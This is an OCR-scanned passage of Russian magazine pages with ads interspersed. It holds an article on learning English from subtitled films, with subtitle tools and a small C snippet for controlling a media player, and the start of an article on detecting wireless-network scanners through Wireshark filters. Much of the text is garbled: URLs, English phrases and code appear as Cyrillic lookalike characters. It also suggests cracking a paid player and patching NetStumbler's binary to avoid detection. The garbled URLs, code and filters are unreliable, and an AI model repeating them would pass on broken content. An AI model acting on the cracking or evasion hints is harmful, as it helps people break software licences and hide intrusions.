очередного широко разрекламированного 
курса, ты надеешься проснуться с полным словарным за- 
пасов в голове, что вполне понятно (грызть гранит науки — 
это не пиццууплетать). Но, увы, даже если допустить, что во 
сне (или под гипнозом) можноусвоитьогромное количество 
информации за короткое время, это не сильно приблизит 
нас к решению проблемы. Язык — это не только свод правил 
и словарный запас, но еще и совокупность навыков, при- 
обретаемыхтолько опытным путем. Можно долго читать 
учебники, наизусть выучить словарь, но толку от это го будет 
— ноль! Это подобно игре в хоккей: ты можешь сколько 
угодно смотреть на бравых парней по телевизору, знать 
о них все, но ездить на коньках и забивать шайбыты от этого 
лучше не будешь! И вообще, знать язык и изъясняться на 
языке — понятия перпендикулярные. Возьмем, к приме- 
ру, меня. Можно ли сказать, что я знаю язык? Конечно 
же, нет! Я постоянно путаю лица, времена и совершаю 
массудругих глупых ошибок, а употребление предлогов для 
меня вообще темный лес... Тем не менее, я свободно прочи- 
тываю до нескольких сотен страництехнической докумен- 
тации в день, наслаждаюсь оригинальными английскими 
книгами, занимаюсьѵѵеЬ-серфингом, активно переписыва- 
юсь с зарубежными друзьями, смотрю фильмы без перевода 
(разбирая на слух до -75%), и все это практически без помо- 
щи словаря и... без дополнительн ых трудозатрат. В учебни- 
ки вгрызаюсь лишь в свободное время, которого в лучшем 
случаеудается выкроить не больше нескольких часов 
в неделю. И при этом прошуучесть, что врожденной склон- 
ности к языкам у меня нет. Зато я понимаю, что лучший 
подход к делу — это учить язык на практике. 

□Хакерский способ 

Возможности поехать на год за границу и набраться всех 
премудростей того же английского от англичан у меня 
нет, хотя это, безусловно, наилучший вариант. Чтение 
английскихтекстов, несомненно, дает результаты. При жи- 
вом разборе предложений грамматические конструкции 
и незнакомые слова врезаются в память намного лучше, чем 
при зубрежке искусственных примеров. К тому же не- 
используемые (редко используемые) конструкции идут 
лесом — оптимизация, однако! Но сухиетексты — это все 
же не то. Мой фирменный рецепт — фильмы. По фильмам 
(с оригинальной звуковой дорожкой и субтитрами) за 2-3 
месяца языкосваивается до вполне приемлемого уровня 
и легко воспринимается на слух. Такой подход имеет массу 



преимуществ перед традиционными методиками. Ког- 
да в книге написано: «риКіИе Іеѵеі», то еще сообразить 
надо, что имеется в виду (при условии что данное зна- 
чение слова «Іеѵеі» нам еще не известно), а из фильма 
все ясно и так. Сказали обезьяне потянуть за рычаг 
— она и потянула (а что ей еще оставалось делать?!) 

К тому же лично у меня (да, наверное, и у остальных) 
лучшезапоминаются не слова, а целыефразы или даже 
предложения. Например, слово «сіеврегабоп» само по себе 
безлико. Фигзапомнишь. Но когда Морфиус говорит: «ТЫв 
аКаскізапасІо^сІезрегаІіоп», оно крепко врезается в память. 
Короче, будем считать, что я тебя убедил. Берем фильм 
(где брать, мы еще разберемся), начинаем смотреть 
и... практически ничего не понимаем, улавливая лишь 
отдельные слова. Все остальное сливается для нас в нечле- 
нораздельную речь, пролетающую мимо сознания. Не пе- 
реживай и не впадай в депрессию. С твоими ушами все 
в порядке. У всех нормальных людей при обычном разговоре 
до мозга доходит порядка 30% звуковой информации, ос- 
тальное необратимотеряется по дороге. Опыт, полученный 
при прослушивании пластинок, наговоренных диктором 
с четким британским выговором, которые иногда крутили 
в школе, — плохой помощник. То же самое относится к муль- 
тимедийным дискам с курсом английского языка. 

Живой языкон... совсем другой. Британцы, когда 
говорят, в транскрипцию не смотрят, а что касается 
Америки, кладбища всех культур и народов, то здесь понятие 
«правильного произношения» отсутствует вообще. 

□ Субтитры, или палочка-выручалочка 

Бесполезно слушать речь, если ни черта 
не понятно. Это никакая не тренировка получается, а са- 
мая настоящая мастурбация! Тут-то субтитры 
и выручают! Синхронный вывод текста на экран позво- 
ляет сопоставить звуки и буквы. Вот появляется длинная 
фраза (строки на две будет), мы внутренне готовимся 
к «схватке», мысленно проговаривая ее про себя, и вдруг 
выясняется, что герой ее уже сказал. Когда же он 
успел?! Какой облом! Не надо удивляться. Разговорный 
английский намного короче, чем письменный, к то- 
муже американцы часто глотают не только отдельные 
слоги, но и целые слова или произносят их на крейсерс- 
кой скорости. Поэтому, прежде чем смотреть фильм, суб- 
титры желательно несколько раз прочитать, убедившись, 
что все слова известны (а неизвестные — найти 
в словаре). Скорость чтения «с листа» никакие может 
превышать продолжительности фильма. Если мы тормо- 
зим с переводом, то со слуха и подавно ничего не поймем! 



» 




>На диске 
ты найдешь 
плееры, кодеки, про- 
граммы для работы 
с субтитрами, ко- 
торые помогуттебе 
освоитьанглийский. 




>Лучшие интернет- 
магазины, торгую- 
щие СБ-дисками 
с фильмами на 
английском языке: 
ѵѵѵѵѵѵ.двіисіѵ.ги; 
ѵѵѵѵѵѵ.кіпоЬох.ги: 
ѵѵѵѵѵѵ.пабѵе-епдІІБЬ.ги. 



> Естественно, прос- 
то взять и начать 
просматривать 
иностранные 
фильмы в оригинале 
трудно. 

Ноя уверен, что 
почти каждый из 
нас имеет хотя бы 
минимальноезна- 
ние языка. А оно-то 
и нужно! 
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> Окно настроек РРйЗЬоѵѵ, ответственное за отображение 
субтитров 




$дій Іісепье і : . ПегеЬу зрелей 

іпйеГіПгіеІу 




> ЗиЫіІІе ѴѴогкзЬор идеально подходит как видеоплеер 



На йѴО субтитры хранятся в графическом 
виде, что не есть хорошо, но на род уже давно 
наловчился выдирать их оттуда, перегоняя 
в текстовой файл, записанный в том или 
ином формате. Основных форматов два — зиЬ 
и 5Іг. В первом случаетекст привязан к номе- 
рам фреймов (смотри листинг 1), во втором — ко 
времени от начала фильма (смотри листинг 2). 
.Файлы субтитров можно спокойно модифици- 
ровать в любом текстовом редакторе, помечая 
непонятные места, слова, которые не удалось 
разобрать и т.д. При многократном прослуши- 
вании зацикленного фрагмента часть неразбор- 
чивых слов постепенно «проявляется», а часть 
— таки остается энигмой. По мере обучения 
языку, «распознавательные» способности 
неуклонно растут и большинство пометок 
снимается, но достичь 100% результата удается 
далеко не всегда. Текст субтитров слегка от- 
личается от произносимого в фильме, причем 
это несоответствие может быть как негативным 
(пропущенные слова), таки позитивным (лиш- 
ние слова, отсутствующие в речи актера). 

По умолчанию субтитры отображаются в нижней 
части экрана. Считается, чтотакудобно. Ну, для 
обычного просмотра, может быть, и удобно 
(текст не загораживает изображение), но нам 
для облегчения восприятия субтитры лучше 
всего поднять наверх. А отслеживать произ- 
носимые слова помогает мышь. На первых 
порах, пока большинство слов на слух еще 
не понятно, распознание границсловуже 
можно считать большим достижением, после 
которого прогресс в обучении будет происхо- 
дить заметно быстрее. Еще один совет: слушать 
фильм лучше всего в наушниках — таклегче 
сосредоточиться на звуке, да и качество у них 
будет повыше, чему колонок. 

□ Необходимые ингредиенты 

Для изучения английского по фильмам 
нам, в первую очередь, нужны фильмы 
с оригинальной звуковой дорожкой 
и субтитрами, а еще плеер с возможнос- 
тью быстрой прокрутки назад, прыжков во 



времени, установки закладок и прочими 
удобствами по вкусу. Слово «быстрой» здесь 
ключевое. Перемотку поддерживают практи- 
чески все плееры, в том числе и стандартный 
Місгозо^і Месііа РІауегСІаввіс, но сколько 
телодвижений (и движений мышью) при этом 
придется совершить? Это же сдохнуть можно 
за это время! Крайнежелательна возможность 
замедления изображения (вместе созвуком) 
на 10%, 20%, 30%. .. Большинство плееров 
поддерживают слишком грубый скоростной 
ряд — 2/Зх, 1/2х, 1/4х, причем звукони, как 
правило, отключают, что нас совершенно 
не устраивает, поскольку замедление на 1 0-30% 
значительно упрощает декодирование нераз- 
борчивой речи и быстрыхдиалогов. На пер- 
вых порах без этого никуда! Также будут 
совсем не лишними эквалайзер и программы 
улучшения четкости речи. Другой ключевой 
ингредиент — субтитры и средства их вывода на 
экран. Теперь выясним, где все это найти. 

□ Фильмы 

Проще и легче всего покупать уже срипан- 
ные фильмы с выверенными субтитрами 
на СО/ОѴО в специализированных интер- 
нет-магазинах, созданных для таких как 
мы. В смысле, для изучающиханглийский 
язык. Достоинства: мы получаем диск, готовый 
к непосредственному употреблению; субтит- 
ры содержат минимум ошибок; оперативная 
доставка; приемлемые цены; забота о клиенте 
(еще бы, ведь клиентов мало, и каждым из них 
приходится дорожить). Недостатки: это не 
штамповка, а С Б-Р, причем не очень высо- 
кого качества. Читается с надрывами, долго 
не живет. Перед просмотром приходится пере- 
гонять на винт (а это потеря времени). Ассор- 
тиментфильмом крайне невелик, а сам рип вы- 
полнен довольно грубо — необрезанные черные 
полосы, черезстрочечная развертка, закодиро- 
ванная как прогрессивная (быстро движущиеся 
объекты омерзительно двоятся, а при смене 
сцены соседние кадры накладываются друг 
на друга). Со звуком, впрочем, все в порядке 



(чаще всего он трЗ, чуть реже — АСЗ). А на 
изображение при изучении английского можно 
и не обращать внимания. Списоктаких специ- 
ализированных сайтовты найдешь в боковых 
выносах. 

Обладателям БУй-привода (которым сейчас 
обладают практически все) одновремен- 
но и проще и сложнее. Проще, потому что 
достаточно многие фильмы содержатори- 
гинальную звуковую дорожку, а некоторые 

— еще и оригинальные субтитры. Но! Как уже 
говорилось, на ОѴО субтитры хранятся в тек- 
стовом виде и предварительно должны быть 
срипаны. ОѴО-плееры достаточно ограничены 
в плане функциональности, и для реальной 
работы с видеоматериалом его приходится пе- 
регонять в более привычный формат АѴІ, о чем 
мы говорили в статье «Правильный ОѴО-Рір 
своими руками». 

Но затраченные усилия стояттого, пос- 
колькузначительно расширяют 
ассортимент, а в обучении языку главное 

— это разнообразие. В разныхфильмахактеры 
говорят по-разному: отхорошо поставленной 
речи, как, например, в «ТНе Маігіх», до улично- 
го английского («СИазіпд Ату»), Но еще важнее 
отобрать фильмы, которые можно без отвраще- 
ния смотреть по 10-15 раз, а таких, увы, 
немного. 

Купить ОѴБ можно в любом ларьке, но это всег- 
да «кот в мешке». Даже если наличие ори- 
гинальной звуковой дорожки и субтитров 
указано на коробке, это еще не значит, что 
онитам действительно есть (особенно, если 
диск из серии «лицензия по 80 рэ»). Так что 
проверка на месте обязательна! Убедись, что 
оригинальная звуковая дорожка и субтитры 
синхронизованы с изображением, несинхрон 

— вполне обычное дело. Бытует мнение, что 
«подлинная» лицензия за 350 рэ — это га- 
рантированное качество и никаких подвохов 
здесь нет. Народ тащится от крутости 51ІРЕРВІТ 
и ЕХТРАВІТ, не подозревая, что... мастер-диск 
записывается с помощью АН ЕАБ Ыего (в чем 
легко убедиться, прочитав содержимое Боигсе 
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> Старый добрый ВЗРІауег версии 0.84 готовится 
осуществить прыжок во времени 
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ПОЛЕЗНЫЕ РЕСУРСЫ 

ѵѵѵѵѵѵ.еЕ.ги — «Английский язык из первых рук», много методических 
материалов и оживленный форум, на котором часто встречаются 
реальные носители языка, у которых всегда можно проконсультиро- 
ваться по сложным вопросам; 

ѵѵѵѵѵѵ.игЬапсІісІіопагу.сот —лучший словарь жаргона, какой только 
есть, включающий в себя и матерные слова, и всякиетам идиомати- 
ческие выражения, и даже та кие непереводимые словечки, ка к 9021 0 
[ѵѵогісі I соііеде Ьоу], где 90210 — код Вгеѵѵегу Ніііз, в котором живут бо- 
гатые толстосумы, отсюда «90210 соііеде Ьоу» — «сын нового русского»; 
ѵѵѵѵѵѵТгапкІапд.ги — мульти языковой портал обучения по методу 
Ильи Франка, на котором собрано просто гигантское количество 
учебников, грамматическихсправочников, словарей, литературных 
произведений и всего-всего-всего, что только можно пожелать; 
ѵѵѵѵѵѵ.пабѵе-епдІізЬ.гц — методические материалы по английскому, тес- 
ты на знания языка, форум, магазин, высылающий фильмы по почте 
(между прочим, фильмы довольно хорошего качества); 
ѵѵѵѵѵѵ.еБІпоІеБ.сот/тоѵіеБ/рсІІ — специально для изучающих язык 
по фильмам здесьдаются объяснения всех заковыристых (и не очень 
заковыристых) выражений, которые отсутствуют в обычных 
словарях, но... часто встречаются в реальной жизни. 



Мебіа Ітріегшепіабоп ІсІепШіег), а сколько там 
нарушений Стандарта... 

Вот почему покупать ОѴй по интернету 
довольно рискованно. Ктомуже далеко 
не все магазины утруждают себя указани- 
емтаких параметров, какязыки наличие 
субтитров. Но один магазин, которым 
постоянно пользуюсь сам, я всежемогу 
порекомендовать: ѵѵѵѵѵѵ.сіѵсісіот.ги . 

О Как рипать субтитры 

Добывать субтитры с йѴО приходится путем 
ОСР, что с учетом низкого разрешения доволь- 
но затруднительно, но... все-таки возможно! Су- 
ществует не такуж много программ, предна- 
значенных для решения этой задачи, и лучше 
всех с ней справляется ЗиЬРІр, пользующийся 
большой популярностью среди риперов, за- 



нимающий всего 833 килобайта (сравни 
с РіпеРеабег), поддерживающий больше дю- 
жины языков и распространяемый совершенно 
бесплатно. Свежую версию всегда можно 
скачать с ЫТрУ/гиддѵ.ѵѵг.сг . 

ЗиЬРІр — это самообучающаяся программа, ра- 
ботающая в кооперации с естественным 
интеллектом, превзойти который еще никому 
не удалось. ЗиЬРІр всего лишь разбиваеттекстна 
отдельные символы — матрицы — и выводитего на 
экран, подсвечивая текущую матрицу прямо- 
угольным курсором и требуя ввести соответству- 
ющий ей символ с клавиатуры. Если соседние 
символы соприкасаются, ЗиЬРІр разобрать их 
по отдельности оказывается не в состоянии 
и они образуют единую мегаматрицу, состоящую 
из двух (реже — трех) символов, которыетакже 
должны быть введены человеком с клавиатуры. 



Однажды введенная матрица сохраня- 
ется в памяти и сравнивается со всеми 
остальными. Если количество различий 
не превышает некоторого порога (задаваемо- 
го в настройках), символ считается успешно 
распознанным. В противном случае ЗиЬРІр 
обращается за консультацией к естественно- 
му интеллекту. 

Темп обучения программы (равно как 
и скорость распознавания) растет 
экспоненциально. Чем бол ыше символов 
узнает ЗиЬРІр, тем реже он дергает 
человека. Некоторые символы, такие, 
например, какзнак«%», разбиваются 
неправильно, и в матрицу попадает л ишь 
верхний кружок. Расшить матрицу можно 
либо кнопкой «>>», либо горячей клавишей 
<АЕТ-РідЫ>. 



Настоящий ТВ-тюнинг! 

ѵѵѵѵѵѵ.ЬеЬоІсІсгги 



УНИКАЛЬНЫЕ ЖЕЛЕЗО И СОФТ: 

+ Безупречные картинка и звук 
+ Запись без рекламы 
+ Объемное изображение 
+ Видеонаблюдекие 




ШИРОКИЙ ВЫБОР УДОВЛЕТВОРИТ ВСЕХ 
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Язык — это не только свод правил и словарный запас, но еще и совокупность 



навыков, приобретаемых только опытным путем. 



Можно долго читать учебники, наизусть выучить словарь, 
но толку от этого будет — ноль! 



На некоторых дисках субтитры имеютсглажи- 
вающую «окантовку», усложняющую задачу 
распознавания, поскольку сглаживание 
каждый раз выполняется слегка по-разно- 
му (это зависит оттого, какой символ ока- 
жется рядом). Специально на этот случай 
предусмотрена функция изменения цвета 
текста (точнее, исключения одного или более 
цветов, окрашивающих шрифт). Нажимаем 
кнопку «СЬапдеіехі соіог» (или давим горячую 
клавишу <АІі-С>) и пробуем подобрать опти- 
мальную комбинацию. 

В конечном счете мы получим текстовой 
файл, содержащий субтитры и... некоторое 
количество ошибок, так что загрузить его в ѴѴогсІ 
и выполнить хотя бы беглую орфографическую 
проверку не помешает. 

□ Охота на субтитры 

А какбыть, если на купленном 0Ѵ0 не- 
обходимые нам английские субтитры 
отсутствуют? Или мы скачали из сети файл 
в формате АѴІ, в котором никаких субтитров 
вообще не предусмотрено? А интернет на 
что?! В нем, если хорошо покопаться, можно 
найти практически все — и черта, и бога, и да- 
же субтитры к нужному фильму! 

Самые большие коллекции субтитров собраны 
на ѵѵѵѵѵѵ.БиЬзсепе.сопп и ѵѵѵѵѵѵ.сІіѵхБиЬбйез.пеС 
Обе абсолютно бесплатны, но последняя тре- 
бует регистрации. Правда, субтитры там пред- 
ставлены в файлах разного формата и имеют 
непредсказуемые качество и {рз. Думаешь, 
ерунда? Ни фига! Это значит, что 
субтитры, выдранные из ЫТЭС-фильма 
(с частой 23,976 кадра в секунду) и запи- 
санные в зиЬ-формате (то есть с привязкой 
к фреймам), при подключении к томуже 
самому фильму, перекодированному в РАС 
(25 кадров в секунду), дадут драматически 
нарастающий несинхрон. Но с этим еще хоть 
как-то можно бороться (например, написать 
конвертор или взять уже готовый, благо их 
море). Хуже, что попадаются разные вер- 
сии одного и того же фильма — от полной 
«режиссерской» до жестоко покоцанной 
цензурой. Тут уже автоматическая конвертация 
не спасает. Однако субтитры все-таки имеют 
определенную ценность, поскольку можно 
прочитать их отдельно от фильма (что сущес- 
твенноупрощает восприятие его на слух) или 
открыть файл субтитров в редакторе и прокру- 
чивать его вместе с фильмом. Естественно, все 
это работает только на определенном этапе 
обучения, когда кое-какие навыки восприятия 
языка на слух уже имеются, но полностью осво- 
бодиться от субтитров еще не удается. 



□ Субтитры и кодеки 

Отображать субтитры можно двояко — либо 
фильтром, либо непосредственно самим 
плеером или кодеком (если они, конечно, под- 
держиваютэту функцию). Фильтром называется 
модуль, участвующий в обработке аудио-/ 
видеопотока. В частности, большинство коде- 
ков представляют собой фильтры. 

Лучший кодек всех времен и народов 
— это, бесспорно, РРОЭЬоѵѵ, поддержива- 
ющий огромное количество всевозможных 
функций, в том числе вывод субтитров. Это бес- 
платная программа, распространяющая в ис- 
ходных кодах. Только не бери версию, лежащую 
на ѵѵѵѵѵѵ.зоцгсеФгде.пеР Она безнадежно уста- 
рела (поскольку по непонятным причинам раз- 
работчикам отрубили доступ к проекту). В насто- 
ящее время скачать самую последнюю версию 
РРОЭНоѵѵ можно с сервера ѵѵѵѵѵѵТгее-сосІесз.сопп 
(более точная ссылка не приводится, поскольку 
она постоянно мигрирует). 

Для быстрого вызова окна настроекзаходим 
в «Программы^РРОЭЬоѵѵ^ѴісІео бесобег 
сопіідигабоп», в графе «Тгау, біаіод & 
рабзз» взводим галку «ЭИоѵѵІгау ісоп», после 
чего переходим в «Собеса» и включаем поддер- 
жку всех форматов, которыетолько понимает 
РРОЭЬоѵѵ, в том числе и РАѴѴѴІбео (несжатое 
видео). Тогда при воспроизведении любого ви- 
деофайла любым плеером, использующим стек 
кодеков, в углу экрана будет отображаться икон- 
ка РРОЭЬоѵѵ. Надеюсь, не нужно объяснять, ка- 
кой мышью ее нужно кликать? 

□ Плееры 

Программа ЭиЬШе ѴѴогкзЬор ( ѵѵѵѵѵѵ.игивоЛ.пеЛ . 
изначально предназначенная для со- 
здателей субтитров, оказалась очень 
удобной для изучающих английский 
по фильмам. Обилие горячих клавиш, воз- 
можность плавного замедления скорости 
воспроизведения звука/видео, отображение 
субтитров в виде списка с перемещающимся 
курсором... Пожалуй, и не придумаешь, чего 
бы еще такого пожелать для комфортной 
работы. Список субтитров удобен тем, что в па- 
узах между диалогами есть время, чтобы про- 
читать следующую реплику и заранее на нее 
настроиться. Причем субтитры можно не толь- 
ко смотреть, но и редактировать! И не только 
редактировать, но и оставлять коммента- 
рии в «параллельном» файле. Вообще- 
то, изначальноон предназначался для 
перевода субтитров на другой язык, но к 
акая, в сущности, разница, что для чего 
предназначалось? В подлунном мире многие 
вещи используются не по назначению, и мир 



от этого только выигрывает. 

ВЭРІауег — это уже видеоплеер в чистом 
виде, но не простой, а довольно 
продвинутый. Помимо горячих клавиш и 
встроенной поддержки вывода субтитров, он 
выгодно отличается отсвоих конкурентов 
тем, что поддерживает«внешний» интерфейс 
управления через ЭепбМеззаде и включает 
в себя ЭОК, позволяющий нам наращивать 
его функциональные возможности под наши 
собственные вкусы и потребности. 

В частности, следующий код позволяет перехо- 
дить к заданной позиции (то есть осуществляет 
прыжокпо времени), проигрывая фрагмент 
нужной продолжительности указанное 
количество раз. 



ПРОГРАММА НАЯЗЫКЕ СИ ДЛЯ 
ВНЕШНЕГО УПРАВЛЕНИЯ ПЛЕЕРОМ 
В5РІ-АѴЕВ, ПРОИГРЫВАЮЩАЯ УЧАСТОК 
ОТ А1 ДО А2 (ЗАДАННЫХ В МИЛЛИСЕКУН- 
ДАХ) N РАЗ 
іпС а; 

НАКПБЬЕ Ъзр_1іапсІ = РіпйМішісж ( 
"ВЗРІауег" , ШЬЬ) ; 

ЗепсЗМеззаде (Ьзр_1іапс1, 

Ѵ\/М_ВЗР_СМБ , ВЗР_Зеек , А1) ; 

Рог (а = 0; а < Ы; а++) 

{ 

ІР ( ЗепсІМеззаде ( 

Ъзр_1шпсб , Ш_ВЗР_СМБ , 
ВЗР_СеРМоѵРоз , 0 ) >= А2 ) 
ЗепсЗМеззаде (Ьзр_Ь.агкб, 

Ш[_ВЗР_СМБ , ВЗР_Зеек , АІ ) ; 

} 



Я до сих пор использую бесплатную древнюю 
версию 0.84, которой вполне доволен и с ко- 
торой никуда не собираюсь съезжать. Новые 
версии (какэто обычно и бывает) намного боль- 

РЕКОМЕНДУЕМЫЕ ФИЛЬМЫ 

Маігіх-І (очень разборчивый говор, короткие 
диалоги); 

Оиееп оіЧЬе батпеб (очень разборчивый 
говор, диалоги средней длины); 

Рігаіез оНЬе сагіЬЬеап (разборчивый 
говор, диалоги средней длины); 

N і пРЬ даіе (разборчивый говор, короткие 
диалоги); 

ЭЬгек (разборчивый говор, диалоги средней 
длины); 

28 сіаув Іаіег (разборчивая речь, короткие 
диалоги). 
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СРЕЛТІѴЕ 




> Осторожно! Идет поиск субтитров 



ше прибавляют в весе, чем в функциональности. К тому же с некоторого 
времени ВБРІауегстал просить денежку или... показывать рекламу. Так 
что решай сам: платить или ломать. А скачать его можно с ѵѵкѵѵѵѵ. Ьз р Іа ѵе г. о гд . 




□ Заключение 

Вот и подошло к концу наше небольшое рандеву. Впереди —тропа, веду- 
щая если не к познанию языка, то, по крайней мере, к овладению им. Так 
сказать, взятию силой без какого-либо согласия с его стороны. И пусть 
пижоны доказывают нам, чтотакязыкне учати, вообще, «американский 
английский» неправильный и т.д. и т.п. Язык — это, прежде всего, средс- 
тво общения (и приобщения к сокровищнице мировой культуры 
и информации). Если не углубляться в языковые дебри, то можно 
обнаружить, что английский — намного более простая штука, чем кажется 
нам по учебникам. 

Легче всего язык осваивается именно в процессе живого общения 
(пускай, хотя бы и одностороннего, как в случае с фильмами). Учить же 
его «вхолостую», без конкретного приложения — означает понапрасну 
терять время, которое лучше потратить на кодирование/ 
дизассемблирование. ПЕ 

код 

Листинг 1: Фраг- 
мент файла 
суБтитров, 
записанного в гиЬ- 
формате 
{1421} {1457 } 
ЗотеЬосЗу азкесі 
те: 

{1463} {1541} 
<<РЪі1,іб уои 
соиісі Ье 
апуткЬеге, Іѵгкеге 
ѵгоиШ уои Ье?» 

{ 1547 } { 1608 } 

I заісі 
До Мт, 

I «РгоЬаЫу 
гідЬб кеге. . . 



КОД 

Листинг 2: Фрагмент файла суБтитров, 
записанного в г^г-фсрмате 
1 

00:01:29,381 --> 00:01:31,800 
Ткеге сотез а біте 
бог еѵегу ѵатріге. . . 

2 

00:01:31,967 --> 00:01:37,222 
. . .ѵгкеп Оке ісіеа об ебегпібу Ьесотез 
тотепбагііу ипЬеагаЫе. 

3 

00:01:37,431 --> 00:01:41,643 
Ьіѵіпд апсі беесііпд іп б Ье зкасктл/з 
ѵгібк опіу уоиг оші сотрапу. . 
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ЛУЧШЕЕ В МИРЕ ЗВУКА 
ОТ СОЗДАТЕЛЕЙ 
ЦИФРОВОГО ЗВУКА 



Если вы хотите услышать разницу, 
которую способны дать 25 лет лидерства 
в цифровых аудио технологиях, то 
наушники СгеаЛѵе 2ЕЫ Аигѵапа - это Ваш 
выбор 



• Блокирование до 90 процентов внешних шумов 
благодаря технологии АигаЗеаІ™. 

• Качественная передача звукового сигнала. 

• Комфортное прослушивание в течение 
продолжительного времени. 




2 Е N 

А II В V А N А 

ѵѵѵѵѵѵ.сгеаііѵе.ги 



© СорупдЩ 2006. Сгеабѵе ТесИпоІоду иб. 

Сгеабѵе является зарегистрированной торговой маркой Сгеабѵе ТесИпоІоду ббсі. 






не забава! Пошалишь и смотаешься. 



Проникнуть в чужую беспроводную сеть ■ 

Взломщик не подключается к сети по провод&м и может находиться где угодно, лишь 
бы был уверенный прием. В автомобиле на улице, например. Попробуй поймай! Толь- 
ко вот, что я тебе скажу: все это популярное заблуждение. Технологии защиты 
развиваются, и даже банальное сканирование эфира самими обычными программами 
выдаст тебя с потрохами. А ты не знал? 



□ Как выявить сканирование? 

Чтобы найти поблизости беспроводные 
устройства, а следовательно, и беспровод- 
ные сети, используютспециальные сканеры 
эфира. Поставил такую штуку на ноутбук или 
КПК и гуляешь по городу, в то время как 
программа ведетлоги всех найденныхточек 
доступа с указанием 55Ю (идентификатора 
сети), производителя оборудования, меха- 
низма шифрования, скорости работы и даже 
координат, если к ноуту подключен 6Р5-модуль. 
Знакомые софтины — ЫеізІатЫег, МасзіатЫег, 
Кізтеі (или его версия под винду — Кізѵѵіп) 

— в два счета просканируютэфир и выдадут всю 
информацию на экран. 



Нотутесть один важный момент, о котором 
многие даже не подозревают! Эти скане- 
ры не просто пассивно просматривают 
эфир, но также используютактивные методы 
исследования, посылая в сеть специаль- 
ные пакеты. Еслиты просканировал эфир 
Ые^атЫег’ом, то считай, ты уже выдал свое 
присутствие. Хорошо, если беспроводная 
сеть — это одинокая точка доступа, которой 
вряд л и даже поменяли па роль для адми- 
нистрирования через веб-панель. Но если 
это серьезная компания, то к любой подобной 
активности (внутри закрытой сети) отнесутся 
с подозрением. И делотутвотв чем. 

Когда осуществляется пассивное сканирование 



(в соответствии со стандартом 
802.1 1 , то есть ѴѴІ-Рі), ничего страшного 
не происходит, но и эффективностьтакого ска- 
нирования нулевая! Как только дело касается 
интимной информации о сети (которая может 
быть очень полезна взломщику), стемблер 
выдаетсвое присутствие из-за специального 
ШЗ/ЗЫАР-фрейма. 

Еще 3 года назад (23 марта 2002 года) хакер-ис- 
следователь Міке Сгаік предложил уникальный 
идентификатор, по которому можно задетек- 
тить трафик программы ЫеіЗіитЫег: Ш0- 
фреймы, генерируемые сканером и содержа- 
щие уникальный идентификатор (ОЮ) 0x006016 
и идентификатор протокола (РЮ) 0x0001 . Кроме 
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> После пробы такого софта МезІитЫег использовать 
даже как-то не хочется 



того, специальная строковая переменная, передающаяся 
через 58-байтное поле данных, содержит информацию 
о версии продукта в так называемом «пасхальном яйце»: 

0.3.2 РІигЫе дгопк Ыооріі , Ьпір Ргипсііеігипе 
0.3.2 АН уоиг 802 . 11Ь аге Ьеіопд До из 
0.3.3 " іпіепііопаііу Ыапк" 



Причин для таких подвохов можетбыть много, в том числе 
просьба оперативных органов, ссориться с которыми автору 
бесплатной программы, естественно, не хочется. Чтобы 
устранить «пасхальное яйцо», следует поковырять би- 
нарник пеівіитЫег.ехе редактором ресурсов и изменить 
его. Но это не решитпроблему обнаружения сканирования 
(с НС-фреймом ничего не сделать). И к слову, МіпівіитЫег 

— тулза изтойже серии, только для платформы Роскеі РС, 

— содержитаналогичные подвохи. 

□А как насчет 

альтернативы ЫеІБІитЫег'у? 

Теперь понятно, каким образомтебя может выдать обычное 
сканирование? И вроде бы ничего не делал, а по шапке по- 
лучить уже можешь. Причем что с ЫеІ:5І:иппЫег’ом, что с лю- 
бым другим софтом. Рассмотрим лишь несколько примеров. 

ОБіитЫег ( ѵулллллгіасЬЬОгіеп.сот/ргоіесізЛізШтЫег.НітІ ) 

Это известнейший В50-сканер беспроводных сетей, 
который, в отличие от Ыеізі и гшЫег, может проводить пас- 
сивное сканирование (режим РЕМОЙ), то есть определяет 
наличие точки доступа и ее 551 й. Тем не менее, в режиме 
активного сканирования в немтоже существуют эксклю- 
зивные свойства. В поискахточки доступа программа 
генерирует огромное количество запросов (^гате_сопігоІ 
0x0040). После получения ответа точки доступа на подобный 
запрос, будет произведена попытка запроса авториза- 
ции (0х0Ь) и ассоциации (0x0с). Эти значения являются 
константами, что дает право на их использование в качестве 
уникального идентификатора. 

ѴѴеІІепгеіІег ( ѵѵѵѵѵѵ.ѵѵеЦепгеііег.пе* ) 

Можетбыть, кто-то, прочитав это, подумает: «А в чем 
проблема? Заюзай пассивное сканирование, и все 
дела!» Возьмем сканер ѴѴеІІепгеііег, основанный как раз на 
этом принципе и включенный в состав известного хакерс- 
кого І_іѵеСО-дистрибутива — ВаскТгаск. Утилита заточена 
под ІІпіхѵѵаге-окружение и в качестве базового условия для 
старта, естественно, использует іѵѵсопбд. После опознавания 
беспроводной карточки Е55Ю будет автоматически выставлен 




> Модель логики построения безопасности 
сучастием сенсоров 



на «ТЫв ів изеб бог ѵѵеііеп геііег», а МАС-адрес сконфигури- 
рован на произвольный. Опять палево! 

Послетакого разгрома даже руки опускаются. Не софт, а на- 
стоящее западло для хакера. Что же делать? Заюзать 
ѴѴІпбоѵѵз-механизм? Скачивать ничего не надо, и работает 
он, в общем-то, неплохо — хороший, вроде бы, 
вариант... Как бы не так! Его механизм тоже использует 
активный режим сканирования, посылаются те же запросы 
с широковещательным 55Ю и уникальным программным 
идентификатором, что и будет основой детекта подобного 
рода сканирования. Уникальный фрагмент находится в час- 
ти «55Ю Рагате1;ег5е1:» и состоит из 32 байтов. 
Воспользовавшись функциональными способностями 
снифера ЕіЬегеаІ (ѴѴІгевЬагк), можно без труда определить 
подобную активность потенциального «воздушного» хакера: 

ЫеІзІитЫег : отіап . 1с . 1уре_зиЫуре ед 32 апсі 
I 11с. оиі ед 0x00601с! апсі Ііс.рісі ед 0x0001 

БзІитЫег: (міап.зед ед 11 апсі ѵ/іап. 

1с . зиЫуре ед 11) ог (міап.зед ед 12 апсі 

отіап. 1с . зиЫуре ед 00) 

Здесь 1 1 (0х0Ь) — значение во фреймеавторизации, 1 2 (0x0с) 
— константа иззапроса ассоциации. 

□ Как поймать хулигана? 

Важно не столько засечь несанкционированные действия 
в сети, сколько выявить нарушителя. Здесь возникает 
определенная головоломка, так как мобильность самой 
технологии ѴѴІ-ЕІ изначально подразумеваеттаких же 
мобильных клиентов, которые могут перемещаться во 
время сеанса пользования сетью. Нашей задачей будет 
выработка схемы сетевой инфраструктуры, в которой су- 
ществовало бы как минимум две предпосылки, свидетель- 
ствующие о наличии злоумышленника среди доверенного 
радиопокрытия. Способы обнаружения злоумышленника 
